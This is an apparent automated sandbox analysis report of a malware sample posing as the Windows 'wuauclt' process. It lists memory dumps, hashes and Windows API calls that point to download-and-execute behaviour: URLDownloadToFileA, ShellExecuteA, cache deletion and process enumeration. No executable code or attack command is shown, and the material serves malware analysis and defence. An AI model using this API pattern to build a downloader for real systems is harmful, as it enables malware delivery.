                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: d88d1b090b606c9240d6ad4c0da6df15bcbd48f7d749465171b98e542ed98b96
                                                                            • Instruction ID: 4a6b08c2b722228e21e0a8b4d92f73f88c53a7eb371671c656a79b332b0462ea
                                                                            • Opcode Fuzzy Hash: d88d1b090b606c9240d6ad4c0da6df15bcbd48f7d749465171b98e542ed98b96
                                                                            • Instruction Fuzzy Hash: 79D05B201041016FE72067358A2A73D7595E744784FE44477F449F96E1E5FDCC85911D
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 004012FF
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001), ref: 00401326
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction ID: d870f39221132c547acdf604606a3f6d37415c35f40f0878f1ff510f596d474e
                                                                            • Opcode Fuzzy Hash: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction Fuzzy Hash: 82F02772B0023067EB20696E0C85B4366D59F49790F14407AFF08FF3E9D6B98C0042A9
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000437,00000000,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439E09
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction ID: 59c6dd2a180df94c7d145a0c1afdd1ca961f3c5420aeb78bf2f24ad8b18ccf6d
                                                                            • Opcode Fuzzy Hash: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction Fuzzy Hash: 08516E72A042068FC724CF18C881A5BB3E5BF88710F19892EEC59DB355DB75ED06CB95
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,0043844C), ref: 00438565
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction ID: 4fc79d3f2b5b8faf063af9b8bc26cff02520aca8bab65447a439d837e7e270b0
                                                                            • Opcode Fuzzy Hash: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction Fuzzy Hash: 2821C272904354EFEB224B14DC407BBF7A0EF88314F34686EF48A57281DA785D85CA54
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: db41b0ba3a44b8224a4d418b805d9062f5bccf6ef3d49d7edfc8f6e9fd2d226f
                                                                            • Instruction ID: a4e659a15bfe6cc6a5175c85437e059c15b529ad29c6638f01f64b8e280c5786
                                                                            • Opcode Fuzzy Hash: db41b0ba3a44b8224a4d418b805d9062f5bccf6ef3d49d7edfc8f6e9fd2d226f
                                                                            • Instruction Fuzzy Hash: 8BE0FEB2204209BFEB00DE8ADCC1DABB7ACFB4C654F804115BB1C97242D275AC608B71
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 8b228866068003d5a64e75c2e509e979b335083b2cdf08991ca5778dcb1b938b
                                                                            • Instruction ID: 1a50dcc7cdea4a8dd795a97503a1aea6df38831d2862f32125516eae5aa71f33
                                                                            • Opcode Fuzzy Hash: 8b228866068003d5a64e75c2e509e979b335083b2cdf08991ca5778dcb1b938b
                                                                            • Instruction Fuzzy Hash: 3BE0FEB2204209BBDB00DE8ADCC1DABB7ACFB4C654F804105BB1C972428275AC608B71
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004047CD
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction ID: c40cfb2cff0e8543d494dcdfcbf93d461de1da01fd97da5991265f8cc755c822
                                                                            • Opcode Fuzzy Hash: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction Fuzzy Hash: EFC012A261122017CA1066F52C844C3579CC9891FA31404B3B704E7141E2398C105294
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction ID: 42de1c329415a5983c08d079f819a82d79578491e5c84c113ccbfbe26003380b
                                                                            • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                                            • Instruction Fuzzy Hash: 88D01273250248AFC700EEBDCC06DAB33DC9B68609B048429B918C7100D13DE9508B60
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMutex
                                                                            • String ID:
                                                                            • API String ID: 1964310414-0
                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction ID: dbdaa29d8d5ab3acf8359d31fd046521d7a3cbff9559bf3fa2f5df482b1e4750
                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                            • Instruction Fuzzy Hash: 01C01273150248ABC700EEA9CC06D9B33DC5B68609B048429B918C7100C13DE5508B60
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 004080C8: DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                              • Part of subcall function 004080C8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                              • Part of subcall function 004080C8: DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                              • Part of subcall function 004081E8: DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 004081E8: DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                              • Part of subcall function 004081E8: URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                              • Part of subcall function 004081E8: Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$Download$ConnectedInternetSleepState
                                                                            • String ID:
                                                                            • API String ID: 1369373786-0
                                                                            • Opcode ID: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction ID: 670bd1f1822fbab38942ef8954843972be358391e24c76c7ecbd6b66639f9f51
                                                                            • Opcode Fuzzy Hash: dc49b30eb8cb48e74656dd8cc77bc0eff6cc65cfc1c0bbd4c620f9731a48f245
                                                                            • Instruction Fuzzy Hash: 15C012A011820062D600BBA6AA02B5A668C0F80714F41443EB6C4A60C1EE3C8044822A
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction ID: c017c2d3cd7702cc40293f0c0b92f299cfcc0552216a4ded47398421e2e7ca9f
                                                                            • Opcode Fuzzy Hash: 601bb27103df1dd6ab7ae887f59132927187b2ef7b094d011fc2b20d749a3531
                                                                            • Instruction Fuzzy Hash: 49C08CF03092007BDA0CAA148C03F7E329C8780750F00442DB28096185C66054008129
                                                                            APIs
                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                              • Part of subcall function 00406728: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ConnectedExecuteInternetShellState
                                                                            • String ID:
                                                                            • API String ID: 3822808191-0
                                                                            • Opcode ID: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction ID: cb9ba5a357dbf17f807466452ced53c340c992696767b35d6928e3153f41e3a9
                                                                            • Opcode Fuzzy Hash: 5fe85a0e7d98bcb115740b811f82c610ad9dcd17b5c26daa3db827d2b0b6e89f
                                                                            • Instruction Fuzzy Hash: 41C08CB110820061D6007B62AD01B5A66CC8F80704F41483E7684E20C4EB3CC444922A
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 00401410
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction ID: 1e9abf7fae11d483954ba497bcecb7b42a35322519b3fee74413ce08071db684
                                                                            • Opcode Fuzzy Hash: 3a89578715c780a72c9bcc2f7238351524d5baf693c614b1e8794c1720b1a924
                                                                            • Instruction Fuzzy Hash: CC21F970608711AFD710DF19D88065BBBE4EF85720F14C92AE4989B3A1D378EC41CB5A
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014D1
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction ID: b23f443f85bfc2a6968270b1b6cd2558eb490b707325928d34c95879452a6769
                                                                            • Opcode Fuzzy Hash: 21dbc31cb6900595ad653052610acc884adf6bc7d0a0183df4107cd3429863bc
                                                                            • Instruction Fuzzy Hash: 2C11AC72A047019FC320CF29CD80A2BB7E1EBC4360F15C63EE588A73B5E634AC40C689
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,?,00003FFF,0040175F), ref: 00401552
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction ID: 909510ce892baa7c9b48256ed29b6e7cd33d2823f62f9fa2e1c19f749eef1782
                                                                            • Opcode Fuzzy Hash: 5a288f3db3f787fd20fc88d3d5c71f120b612570d67012e4ddc5ad127cebd5a4
                                                                            • Instruction Fuzzy Hash: 7C01F7726443146FC310DE28DCC092A77A4EBC5364F15053EDA86AB3A1E63AAC0187A9
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,?,?,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439D1B
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction ID: 794ef5d78045ed4d742bdaeeac8ed0779eb977f76541356490a23fe8d5b0fb08
                                                                            • Opcode Fuzzy Hash: 1719246a0053cc99c24b234b1e179e3f801c697a2531001e2cc0710cff91ed1e
                                                                            • Instruction Fuzzy Hash: 3EF0B4B26493207AF124670AAC8BF973F5CDF85B75F00042AF64D5A1C1E4997C10C2BA
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00020000,00001000,00000040,004381FA,004381FA,004381FA), ref: 00438265
                                                                            Memory Dump Source
